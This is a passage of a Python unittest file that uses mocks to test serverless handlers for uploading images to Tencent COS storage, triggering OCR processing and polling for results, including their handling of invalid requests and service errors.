client = mock_cos_client.return_value
test_cases = [
('1.4', {}),
('1.5', {'body': '{}', 'headers': {}}),
('1.6', {'body': '{}', 'headers': {'content-type': 'application/xml'}}),
(
'1.7',
{'body': '{}', 'headers': {'content-type': 'application/json'}}
),
(
'1.8',
{'body': '{"type": "image/jpeg", "image": [1, 2]}', 'headers': {'content-type': 'application/json'}}
),
(
'1.9',
{'body': '{"type": "image/gif", "image": "test"}', 'headers': {'content-type': 'application/json'}}
),
(
'1.10',
{'body': '{"type": "image/jpeg", "image": "testa=="}', 'headers': {'content-type': 'application/json'}}
),
]
for i, case in test_cases:
ret = handler_upload_img_to_cos.main_handler(case, None)
self.check_ret(ret, 400, i)
self.assertFalse(client.put_object.called, f'[case {i}] 非法请求触发了向 COS 的发送')
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_cos_exception(self, mock_cos_client, mock_cos_config):
"""测试 COS 异常情况
测试用例:
1.11 上传时抛出 CosServiceError
1.12 上传时抛出 CosClientError
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
event, _ = self.generate_test_event('test_data/test-img-normal-1.jpg')
client.put_object.side_effect = handler_upload_img_to_cos.CosServiceError('PUT', 'message', 'status_code')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 500, '1.11')
client.put_object.side_effect = handler_upload_img_to_cos.CosClientError('message')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 500, '1.12')
class TestTriggerSubmitImgToOcr(unittest.TestCase):
@staticmethod
def generate_test_event(img_path: str, content_type: str):
"""生成用于触发函数的事件
"""
bucket_cli_name = settings.COS_BUCKET[:-len(settings.QCLOUD_APP_ID) - 1]
return {
'Records': [{
'cos': {
'cosBucket': {
'name': bucket_cli_name,
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'/{settings.QCLOUD_APP_ID}/{bucket_cli_name}/{img_path}',
'meta': {
'Content-Type': content_type
}
}
}
}]
}
def check_ret(self, ret: Any, key: str, case_id: str = None):
"""检查函数返回结果
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertIsInstance(ret, list, f'{case_id_in_msg}函数返回结果类型不符合预期')
self.assertEqual(1, len(ret), f'{case_id_in_msg}函数返回结果条数不符合预期')
self.assertIsInstance(ret[0], dict, f'{case_id_in_msg}函数返回结果子条目类型不符合预期')
self.assertEqual(key, ret[0].get('key'), f'{case_id_in_msg}函数返回结果 key 字段不符合预期')
self.assertEqual(key.split('/')[-1], ret[0].get('filename'), f'{case_id_in_msg}函数返回结果 filename 字段不符合预期')
self.assertEqual(2, len(ret[0]), f'{case_id_in_msg}函数返回结果子条目键数目不符合预期')
def check_scf_call(self, client: mock.MagicMock, key: str, case_id: str = None):
"""检查是否正确使用 SCF 的 call 方法
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
2,
len(client.call.call_args[0]),
f'{case_id_in_msg}调用 SCF 的 call 方法时位置参数的数目不符合预期'
)
self.assertEqual(
'Invoke',
client.call.call_args[0][0],
f'{case_id_in_msg}调用 SCF 的 call 方法时第 1 个位置参数的值不符合预期'
)
image = {
'key': key,
'filename': key.split('/')[-1]
}
self.assertEqual(
{
'Namespace': settings.SUBMIT_IMG_TO_OCR_FUNC_NAMESPACE,
'FunctionName': settings.SUBMIT_IMG_TO_OCR_FUNC_NAME_FORMATTER.format(f_id=key.split('/')[-1][0]),
'InvocationType': 'Event',
'ClientContext': json.dumps(image)
},
client.call.call_args[0][1],
f'{case_id_in_msg}调用 SCF 的 call 方法时第 2 个位置参数的值不符合预期'
)
self.assertEqual(
0,
len(client.call.call_args[1]),
f'{case_id_in_msg}调用 SCF 的 call 方法时有多余的关键字参数'
)
@mock.patch('handler_trigger_submit_img_to_ocr.credential')
@mock.patch('handler_trigger_submit_img_to_ocr.scf_client')
def test_main_process(self, mock_scf_client: mock.MagicMock, mock_credential: mock.MagicMock):
"""测试主过程
测试用例: 4.1.1
"""
mock_credential.Credential.return_value = 'cred'
scf_client = mock_scf_client.ScfClient.return_value
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key, 'image/jpeg')
ret = handler_trigger_submit_img_to_ocr.main_handler(event, None)
self.check_ret(ret, key, '4.1.1')
self.check_scf_call(scf_client, key, '4.1.1')
@mock.patch('handler_trigger_submit_img_to_ocr.credential')
@mock.patch('handler_trigger_submit_img_to_ocr.scf_client')
def test_bad_request(self, mock_scf_client: mock.MagicMock, mock_credential: mock.MagicMock):
"""测试非法入参
测试用例: 4.2.1 - 4.2.5
"""
mock_credential.Credential.return_value = 'cred'
scf_client = mock_scf_client.ScfClient.return_value
test_cases = [
('4.2.1', {}),
('4.2.2', {'Records': [{}, ]}),
('4.2.3', {
'Records': [{
'cos': {
'cosBucket': {
'name': 'bucket',
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'/{settings.QCLOUD_APP_ID}/bucket/img_path',
'meta': {
'Content-Type': 'image/jpeg'
}
}
}
}, ]
}),
('4.2.4', {
'Records': [{
'cos': {
'cosBucket': {
'name': settings.COS_BUCKET.split('-')[0],
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'/{settings.QCLOUD_APP_ID}/{settings.COS_BUCKET.split("-")[0]}/img_path',
'meta': {
'Content-Type': 'image/gif'
}
}
}
}, ]
}),
('4.2.5', {
'Records': [{
'cos': {
'cosBucket': {
'name': settings.COS_BUCKET.split('-')[0],
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'img_path',
'meta': {
'Content-Type': 'image/jpeg'
}
}
}
}, ]
}),
]
for i, test_case in test_cases:
ret = handler_trigger_submit_img_to_ocr.main_handler(test_case, None)
self.assertEqual([], ret, f'[case {i}] 函数返回内容不符合预期')
            self.assertEqual(0, scf_client.call.call_count, f'[case {i}] SCF 的 call 方法调用次数不符合预期')
@mock.patch('handler_trigger_submit_img_to_ocr.credential')
@mock.patch('handler_trigger_submit_img_to_ocr.scf_client')
def test_scf_exception(self, mock_scf_client: mock.MagicMock, mock_credential: mock.MagicMock):
"""测试调用 SCF 发生异常的情况
测试用例: 4.3
"""
mock_credential.Credential.return_value = 'cred'
scf_client = mock_scf_client.ScfClient.return_value
scf_client.call.side_effect = handler_trigger_submit_img_to_ocr.TencentCloudSDKException()
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key, 'image/jpeg')
ret = handler_trigger_submit_img_to_ocr.main_handler(event, None)
self.check_ret(ret, key, '4.3')
class TestSubmitImgToOcr(unittest.TestCase):
@staticmethod
def generate_test_event(key: str):
"""生成用于触发函数的事件
"""
return {
'key': key,
'filename': key.split('/')[-1]
}
@staticmethod
def prepare_mock(
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
mock_settings: mock.MagicMock = None
) -> Tuple[mock.MagicMock, mock.MagicMock]:
"""准备测试所需 mock 的对象
"""
mock_cos_config.return_value = 'config'
cos_client = mock_cos_client.return_value
cos_client.get_presigned_download_url.return_value = 'auth_url'
mock_credential.Credential.return_value = 'cred'
ocr_client = mock_ocr_client.OcrClient.return_value
ocr_client.GeneralBasicOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralFastOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralEfficientOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralAccurateOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralHandwritingOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.TextDetect.return_value.to_json_string.return_value = '{"HasText": true}'
if mock_settings:
for attr in dir(settings):
setattr(mock_settings, attr, getattr(settings, attr))
return cos_client, ocr_client
def check_ret(self, ret: Any, key: str, case_id: str = None):
"""检查函数返回结果
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertIsInstance(ret, dict, f'{case_id_in_msg}函数返回结果类型不符合预期')
self.assertIsInstance(ret, dict, f'{case_id_in_msg}函数返回结果子条目类型不符合预期')
self.assertEqual(key, ret.get('key'), f'{case_id_in_msg}函数返回结果 key 字段不符合预期')
self.assertEqual(key.split('/')[-1], ret.get('filename'), f'{case_id_in_msg}函数返回结果 filename 字段不符合预期')
self.assertEqual('auth_url', ret.get('auth_url'), f'{case_id_in_msg}函数返回结果 auth_url 字段不符合预期')
self.assertEqual('ocr_result', ret.get('result'), f'{case_id_in_msg}函数返回结果 result 字段不符合预期')
self.assertEqual(4, len(ret), f'{case_id_in_msg}函数返回结果子条目键数目不符合预期')
def check_cos_get_presigned_download_url(self, client: mock.MagicMock, key: str, case_id: str = None):
"""检查是否正确使用 COS 的 get_presigned_download_url 方法
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
0,
len(client.get_presigned_download_url.call_args[0]),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时含预期外的位置参数'
)
self.assertEqual(
settings.COS_BUCKET,
client.get_presigned_download_url.call_args[1].get('Bucket'),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时 Bucket 参数不符合预期'
)
self.assertEqual(
key,
client.get_presigned_download_url.call_args[1].get('Key'),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时 Key 参数不符合预期'
)
self.assertEqual(
300,
client.get_presigned_download_url.call_args[1].get('Expired'),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时 Expired 参数不符合预期'
)
self.assertEqual(
3,
len(client.get_presigned_download_url.call_args[1]),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时关键字参数的数目不符合预期'
)
def check_cos_put_object(self, client: mock.MagicMock, key: str, case_id: str = None):
"""检查是否正确使用 COS 的 put_object 方法
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
0,
len(client.put_object.call_args[0]),
f'{case_id_in_msg}上传 OCR 结果时含预期外的位置参数'
)
self.assertEqual(
settings.COS_BUCKET,
client.put_object.call_args[1].get('Bucket'),
f'{case_id_in_msg}上传 OCR 结果时 Bucket 参数与预期不符'
)
self.assertEqual(
f'{settings.RESULTS_ROOT}/{key.split("/")[-1]}.json',
client.put_object.call_args[1].get('Key'),
f'{case_id_in_msg}上传 OCR 结果时 Key 参数与预期不符'
)
self.assertEqual(
'application/json',
client.put_object.call_args[1].get('ContentType'),
f'{case_id_in_msg}上传 OCR 结果时 ContentType 参数与预期不符'
)
self.assertEqual(
'"ocr_result"',
client.put_object.call_args[1].get('Body'),
f'{case_id_in_msg}上传 OCR 结果时 Body 参数与预期不符'
)
self.assertEqual(
4,
len(client.put_object.call_args[1]),
f'{case_id_in_msg}上传 OCR 结果时关键字参数的数目不符合预期'
)
def check_ocr_submit(self, client: mock.MagicMock, mock_settings: mock.MagicMock, case_id: str = None):
"""检查 OCR 服务是否正确调用
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
if mock_settings.OCR_DETECT_FIRST:
self.assertIsInstance(
client.TextDetect.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.TextDetectRequest,
f'{case_id_in_msg}调用 OCR TextDetect 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.TextDetect.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR TextDetect 方法时参数的 ImageUrl 字段不符合预期'
)
if mock_settings.OCR_TYPE == 'basic':
self.assertIsInstance(
client.GeneralBasicOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralBasicOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralBasicOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralBasicOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralBasicOCR 方法时参数的 ImageUrl 字段不符合预期'
)
self.assertEqual(
settings.GENERAL_BASIC_OCR_LANGUAGE,
client.GeneralBasicOCR.call_args[0][0].LanguageType,
f'{case_id_in_msg}调用 OCR GeneralBasicOCR 方法时参数的 LanguageType 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'fast':
self.assertIsInstance(
client.GeneralFastOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralFastOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralFastOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralFastOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralFastOCR 方法时参数的 ImageUrl 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'efficient':
self.assertIsInstance(
client.GeneralEfficientOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralEfficientOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralEfficientOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralEfficientOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralEfficientOCR 方法时参数的 ImageUrl 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'accurate':
self.assertIsInstance(
client.GeneralAccurateOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralAccurateOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralAccurateOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralAccurateOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralAccurateOCR 方法时参数的 ImageUrl 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'handwriting':
self.assertIsInstance(
client.GeneralHandwritingOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralHandwritingOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralHandwritingOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralHandwritingOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralHandwritingOCR 方法时参数的 ImageUrl 字段不符合预期'
)
@mock.patch('handler_submit_img_to_ocr.settings')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_main_process(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
mock_settings: mock.MagicMock
):
"""测试主流程
测试用例: 2.1.1 - 2.1.10
"""
cos_client, ocr_client = self.prepare_mock(
mock_ocr_client,
mock_credential,
mock_cos_client,
mock_cos_config,
mock_settings
)
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
test_cases = [
('2.1.1', 'basic', False),
('2.1.2', 'fast', False),
('2.1.3', 'efficient', False),
('2.1.4', 'accurate', False),
('2.1.5', 'handwriting', False),
('2.1.6', 'basic', True),
('2.1.7', 'fast', True),
('2.1.8', 'efficient', True),
('2.1.9', 'accurate', True),
('2.1.10', 'handwriting', True),
]
for i, test_case in enumerate(test_cases):
mock_settings.OCR_TYPE = test_case[1]
mock_settings.OCR_DETECT_FIRST = test_case[2]
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.check_ret(ret, key, test_case[0])
check_cos_config(self, mock_cos_config, 2 * i + 2, test_case[0])
check_cos_client(self, mock_cos_client, 2 * i + 2, test_case[0])
self.check_cos_get_presigned_download_url(cos_client, key, test_case[0])
self.check_cos_put_object(cos_client, key, test_case[0])
self.check_ocr_submit(ocr_client, mock_settings, test_case[0])
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_cos_exception(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试函数运行过程中 COS 抛出异常的情况
测试用例: 2.2.1 - 2.2.4
"""
cos_client, ocr_client = self.prepare_mock(mock_ocr_client, mock_credential, mock_cos_client, mock_cos_config)
cos_client.get_presigned_download_url.side_effect = [
handler_submit_img_to_ocr.CosServiceError('GET', 'message', 'status_code'),
handler_submit_img_to_ocr.CosClientError('message'),
'auth_url',
'auth_url'
]
cos_client.put_object.side_effect = [
handler_submit_img_to_ocr.CosServiceError('GET', 'message', 'status_code'),
handler_submit_img_to_ocr.CosClientError('message'),
]
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
test_cases = [
('2.2.1', 1, 0),
('2.2.2', 2, 0),
('2.2.3', 4, 1),
('2.2.4', 6, 2)
]
for test_case in test_cases:
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.assertEqual(None, ret, f'[case {test_case[0]}] 函数返回内容不符合预期')
check_cos_config(self, mock_cos_config, test_case[1], test_case[0])
check_cos_client(self, mock_cos_client, test_case[1], test_case[0])
self.assertEqual(
test_case[2],
mock_ocr_client.OcrClient.call_count,
f'[case {test_case[0]}] 初始化 OCR 客户端的次数不符合预期'
)
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
def test_upload_bad_result(self, mock_cos_client, mock_cos_config):
"""测试上传格式错误的结果
测试用例: 2.3
"""
self.assertRaises(ValueError, handler_submit_img_to_ocr.upload_result_to_cos, {1, 2, 3}, 'filename.json')
@mock.patch('handler_submit_img_to_ocr.settings')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_no_text(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
mock_settings: mock.MagicMock
):
"""测试没有识别到文字的情况
测试用例: 2.4.1 - 2.4.10
"""
cos_client, ocr_client = self.prepare_mock(
mock_ocr_client,
mock_credential,
mock_cos_client,
mock_cos_config,
mock_settings
)
no_text_error = handler_submit_img_to_ocr.TencentCloudSDKException(code='FailedOperation.ImageNoText')
ocr_client.GeneralBasicOCR.side_effect = no_text_error
ocr_client.GeneralFastOCR.side_effect = no_text_error
ocr_client.GeneralEfficientOCR.side_effect = no_text_error
ocr_client.GeneralAccurateOCR.side_effect = no_text_error
ocr_client.GeneralHandwritingOCR.side_effect = no_text_error
ocr_client.TextDetect.return_value.to_json_string.return_value = '{"HasText": false}'
test_cases = [
('2.4.1', 'basic', False),
('2.4.2', 'fast', False),
('2.4.3', 'efficient', False),
('2.4.4', 'accurate', False),
('2.4.5', 'handwriting', False),
('2.4.6', 'basic', True),
('2.4.7', 'fast', True),
('2.4.8', 'efficient', True),
('2.4.9', 'accurate', True),
('2.4.10', 'handwriting', True),
]
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
for test_case in test_cases:
mock_settings.OCR_TYPE = test_case[1]
mock_settings.OCR_DETECT_FIRST = test_case[2]
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.assertEqual([], ret.get('result'), f'[case {test_case[0]}] 函数返回内容不符合预期')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_init_ocr_service_error(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
):
"""测试初始化 handler_submit_img_to_ocr.OcrService 错误的情况
测试用例: 2.5.1 - 2.5.3
"""
_, ocr_client = self.prepare_mock(mock_ocr_client, mock_credential, mock_cos_client, mock_cos_config)
        # 2.5.1
self.assertRaises(ValueError, handler_submit_img_to_ocr.OcrService, 'ocr_type')
client = handler_submit_img_to_ocr.OcrService('basic')
client.ocr_type = None
        # 2.5.2
self.assertRaises(ValueError, client.submit, 'auth_url')
        # 2.5.3
self.assertRaises(ValueError, client.get_request, 'auth_url')
@mock.patch('handler_submit_img_to_ocr.CosConfig')
@mock.patch('handler_submit_img_to_ocr.CosS3Client')
@mock.patch('handler_submit_img_to_ocr.credential')
@mock.patch('handler_submit_img_to_ocr.ocr_client')
def test_ocr_exception(
self,
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试 OCR 服务发生异常的情况
测试用例: 2.6
"""
cos_client, ocr_client = self.prepare_mock(mock_ocr_client, mock_credential, mock_cos_client, mock_cos_config)
ocr_error = handler_submit_img_to_ocr.TencentCloudSDKException()
ocr_client.GeneralBasicOCR.side_effect = ocr_error
ocr_client.GeneralFastOCR.side_effect = ocr_error
ocr_client.GeneralEfficientOCR.side_effect = ocr_error
ocr_client.GeneralAccurateOCR.side_effect = ocr_error
ocr_client.GeneralHandwritingOCR.side_effect = ocr_error
ocr_client.TextDetect.side_effect = ocr_error
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key)
ret = handler_submit_img_to_ocr.main_handler(event, None)
self.assertEqual(None, ret, f'[case 2.6] 函数返回内容不符合预期')
self.assertEqual(0, cos_client.put_object.call_count, f'[case 2.6] 发生了预期外的 COS 上传')
class TestCheckResult(unittest.TestCase):
@staticmethod
def get_cos_service_exception(code: str = 'error'):
"""生成 CosServiceError
"""
return handler_check_result.CosServiceError(
'GET',
(
'<Error>'
f' <Code>{code}</Code>'
' <Message>string</Message>'
' <Resource>string</Resource>'
' <RequestId>string</RequestId>'
' <TraceId>string</TraceId>'
'</Error>'
),
404
)
def check_ret(self, ret, status_code: int = 200, body: Any = None, case_id: str = None):
"""检查函数响应
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
self.assertIsInstance(ret, dict, f'{case_id_in_msg}主函数响应格式与预期不符')
self.assertEqual(status_code, ret.get('statusCode'), f'{case_id_in_msg}主函数响应状态码与预期不符')
self.assertFalse(ret.get('isBase64Encoded'), f'{case_id_in_msg}主函数响应 isBase64Encoded 字段与预期不符')
if status_code == 200:
self.assertEqual(
'application/json',
ret.get('headers', {}).get('Content-Type'),
f'{case_id_in_msg}主函数响应 Content-Type 与预期不符'
)
ret_body = json.loads(ret.get('body'))
self.assertEqual(body, ret_body, f'{case_id_in_msg}主函数响应内容与预期不符')
def check_head_object(self, client: mock.MagicMock, img_id: str, case_id: str = None):
"""检查是否正确使用 COS 的 head_object 方法
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
self.assertEqual(1, client.head_object.call_count, f'{case_id_in_msg}对 COS 作 head_object 请求的次数不符合预期')
self.assertEqual(
0,
len(client.head_object.call_args[0]),
f'{case_id_in_msg}对 COS 作 head_object 请求时有预期外的位置参数'
)
self.assertEqual(
settings.COS_BUCKET,
client.head_object.call_args[1].get('Bucket'),
f'{case_id_in_msg}对 COS 作 head_object 请求时 Bucket 参数不符合预期'
)
self.assertEqual(
f'{settings.IMAGES_ROOT}/{img_id}',
client.head_object.call_args[1].get('Key'),
f'{case_id_in_msg}对 COS 作 head_object 请求时 Key 参数不符合预期'
)
self.assertEqual(
2,
len(client.head_object.call_args[1]),
f'{case_id_in_msg}对 COS 作 head_object 请求时位置参数的数目不符合预期'
)
def check_get_object(self, mock_client: mock.MagicMock, img_id: str, call_count: int = -1, case_id: str = None):
"""检查是否正确使用 COS 的 get_object 方法
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
if call_count >= 0:
self.assertEqual(
call_count,
mock_client.get_object.call_count,
f'{case_id_in_msg}对 COS 作 get_object 请求的次数不符合预期'
)
for call_args in mock_client.get_object.call_args_list:
self.assertEqual(0, len(call_args[0]), f'{case_id_in_msg}对 COS 作 get_object 请求时有预期外的位置参数')
self.assertEqual(
settings.COS_BUCKET,
call_args[1].get('Bucket'),
f'{case_id_in_msg}对 COS 作 get_object 请求时 Bucket 参数不符合预期'
)
self.assertEqual(
f'{settings.RESULTS_ROOT}/{img_id}.json',
call_args[1].get('Key'),
f'{case_id_in_msg}对 COS 作 get_object 请求时 Key 参数不符合预期'
)
self.assertEqual(2, len(call_args[1]), f'{case_id_in_msg}对 COS 作 get_object 请求时位置参数的数目不符合预期')
def check_sleep(self, mock_time: mock.MagicMock, call_count: int = -1, case_id: str = None):
"""检查是否正确调用 time.sleep 方法
"""
case_id_in_msg = f'测试用例: {case_id} ,' if case_id else ''
if call_count >= 0:
self.assertEqual(
call_count,
mock_time.sleep.call_count,
f'{case_id_in_msg}调用 time.sleep 的次数不符合预期'
)
for call_args in mock_time.sleep.call_args_list:
self.assertEqual(1, len(call_args[0]), f'{case_id_in_msg}调用 time.sleep 时位置参数数目不符合预期')
self.assertEqual(
settings.CHECK_RESULT_INTERVAL_TIME,
call_args[0][0],
f'{case_id_in_msg}调用 time.sleep 时,睡眠时长不符合预期'
)
self.assertEqual(0, len(call_args[1]), f'{case_id_in_msg}调用 time.sleep 时有预期外的关键字参数')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_main_process(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试主流程
测试用例: 3.1
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
ocr_result = mock.MagicMock()
ocr_result['Body'].get_raw_stream.return_value = BytesIO(b'["ocr_result1", "ocr_result2"]')
client = mock_cos_client.return_value
client.get_object.side_effect = [
self.get_cos_service_exception('NoSuchKey'),
self.get_cos_service_exception('NoSuchKey'),
ocr_result
]
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 200, ["ocr_result1", "ocr_result2"], '3.1')
check_cos_config(self, mock_cos_config, 2, '3.1')
check_cos_client(self, mock_cos_client, 2, '3.1')
self.check_head_object(client, img_id, '3.1')
self.check_get_object(client, img_id, 3, '3.1')
self.check_sleep(mock_time, 2, '3.1')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
def test_bad_request(self, mock_cos_client: mock.MagicMock, mock_cos_config: mock.MagicMock):
"""测试非法请求
测试用例:
3.2 无 img_id
3.3 img_id 带有 '/'
"""
ret = handler_check_result.main_handler({'queryString': {}}, None)
self.check_ret(ret, 400, None, '3.2')
ret = handler_check_result.main_handler(
{'queryString': {'img_id': 'hhh/12345678-1234-1234-1234-1234567890ab'}},
None
)
self.check_ret(ret, 400, None, '3.3')
check_cos_config(self, mock_cos_config, 0, '3.x')
check_cos_client(self, mock_cos_client, 0, '3.x')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
def test_img_not_found(self, mock_cos_client: mock.MagicMock, mock_cos_config: mock.MagicMock):
"""测试图片不存在
测试用例: 3.4
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
client.head_object.side_effect = self.get_cos_service_exception('NoSuchResource')
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler(
{'queryString': {'img_id': img_id}},
None
)
self.check_ret(ret, 404, None, '3.4')
check_cos_config(self, mock_cos_config, 1, '3.4')
check_cos_client(self, mock_cos_client, 1, '3.4')
self.check_head_object(client, img_id, '3.4')
self.check_get_object(client, img_id, 0, '3.4')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_timeout(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试轮询 COS 超时
测试用例: 3.5
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
client = mock_cos_client.return_value
client.get_object.side_effect = [
self.get_cos_service_exception('NoSuchKey')
for _ in range(30)
]
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 200, None, '3.5')
check_cos_config(self, mock_cos_config, 2, '3.5')
check_cos_client(self, mock_cos_client, 2, '3.5')
self.check_head_object(client, img_id, '3.5')
self.check_get_object(client, img_id, 11, '3.5')
self.check_sleep(mock_time, 11, '3.5')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_cos_exception(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试 COS 返回异常的情况
测试用例: 3.6 - 3.9
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
ocr_result = mock.MagicMock()
ocr_result['Body'].get_raw_stream.return_value = BytesIO(b'["ocr_result1", "ocr_result2"]')
client = mock_cos_client.return_value
client.head_object.side_effect = [
handler_check_result.CosServiceError('GET', 'message', 'status_code'),
handler_check_result.CosClientError('message'),
'head',
'head'
]
client.get_object.side_effect = [
handler_check_result.CosServiceError('GET', 'message', 'status_code'),
handler_check_result.CosClientError('message'),
]
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
